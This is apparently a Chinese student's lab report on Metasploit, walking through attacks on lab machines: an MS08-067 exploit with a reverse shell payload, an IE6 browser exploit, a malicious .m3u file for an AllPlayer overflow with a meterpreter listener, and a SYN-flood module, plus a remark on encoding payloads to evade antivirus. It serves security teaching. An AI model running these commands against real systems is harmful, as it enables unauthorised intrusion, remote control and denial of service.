MSF基础应用

20175307 2020-4 《网络对抗技术》Exp6 MSF基础应用 Week10

一、实践目标

1、实践对象

Kali Linux
Metasploitable Linux
Windows 10
Windows 7
Windows XP

2、实践内容

  • 成功主动攻击,如ms08-067
  • 成功针对浏览器的攻击,如ms11-050
  • 成功针对客户端的攻击,如Adobe
  • 成功应用辅助模块的攻击

二、实践过程

1.主动攻击实践

(1)MS08-067漏洞渗透攻击实践(成功)

1.使用Nmap探测靶机的漏洞
nmap -sS -A --srcipt=smb-vuln-ms08-067 -PO 192.168.43.143

2.启动msfconsole查找漏洞
msfconsol进入msfconsol控制台
search ms08_067查看漏洞

3.查看可以使用的payload
show payloads
ms08_067 payloads
4.查看可以被攻击靶机的操作系统版本
show targets

5.设置攻击载荷和连接需要的参数
set payload generic/shell_reverse_tcp
set LHOST 192.168.43.132
set RHOST 192.168.43.144
set RPORT 5307
set LPORT 5307
exploit

6.出现Exploit failed [unreachable]: Rex::ConnectionRefused The connection was refused by the remote host (192.168.43.144:5307). 问题
更改回默认port,就可以了

7.开始入侵:
ipconfig/all命令查看当前电脑网卡的ip信息、DNS信息、DHCP服务器信息等

(2)浏览器的攻击(成功/唯一)

先通过msf搜索漏洞
search Internet
选择了MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
这个漏洞正好针对于Windows XP的IE6浏览器
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.144

成功反弹连接

(3)针对客户端的攻击----ALLPlayer 5.8.1 溢出漏洞(成功、唯一)

首先,我查看了cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat/下的已知客户端的漏洞攻击的rb文件。经过10几种攻击的尝试,最后通过allplayer_m3u_bof.rb 完成了针对客户端的攻击。

1.查看文档

vim allplayer_m3u_bof.rb

大致意思是在AllPlayer5.8.1版本上发现了一个对.m3u文件的溢出漏洞。并在win7 SCP1上可以很好的运行。

2.配置并生成m3u文件

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.132
set LpoRT 5307
set FILENAME 5307.m3u

3.靶机准备换机

首先在http://www.skycn.com/soft/appid/80.html下载ALLplayer5.8.1
安装之后,将攻击机的文件拷贝到靶机XP

4.Kali监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.43.132
set LPORT 5307
exploit

5.冲!

XP双击5307.m3u文件,Kali就获取到了shell,

(4)辅助模块攻击

采用的是dos/tcp模块下的synflood攻击,

设定了300个数据包
win7通过wireshark抓包,tcp连接正好从271到571

三、问题回答和感想

1.问题:用自己的话解释什么是exploit,payload,encode

  • exploit 利用系统、程序或服务的漏洞进行攻击

  • payload 攻击者在靶机上执行的一段代码,即载荷,该代码具有反弹连接、创建用户、执行其他系统命令的功能。

  • encode 可以使载荷进行一个编码,躲过杀软的检测,以便获取更好的攻击效果。

2.感想:

为了完成本次实验,我煞费苦心,浏览了很多帮助文档。通过浏览每一个攻击的描述,我觉得在我们这个看似平和稳定的网络世界里,其实是暗藏杀机的,很多人想通过软件、系统、服务的漏洞去获取不应该属于他们的东西。这和创建这些系统、软件、服务的作者的初衷是背道而驰的,本来这些都是去帮助人们来更好的浏览这个世界,但是这些作品却因为作者的安全意识不强。而沦为了坏人手中的工具。我觉得挺可悲的。

posted on 2020-04-26 20:33  20175307GSC  阅读(447)  评论(0编辑  收藏  举报

导航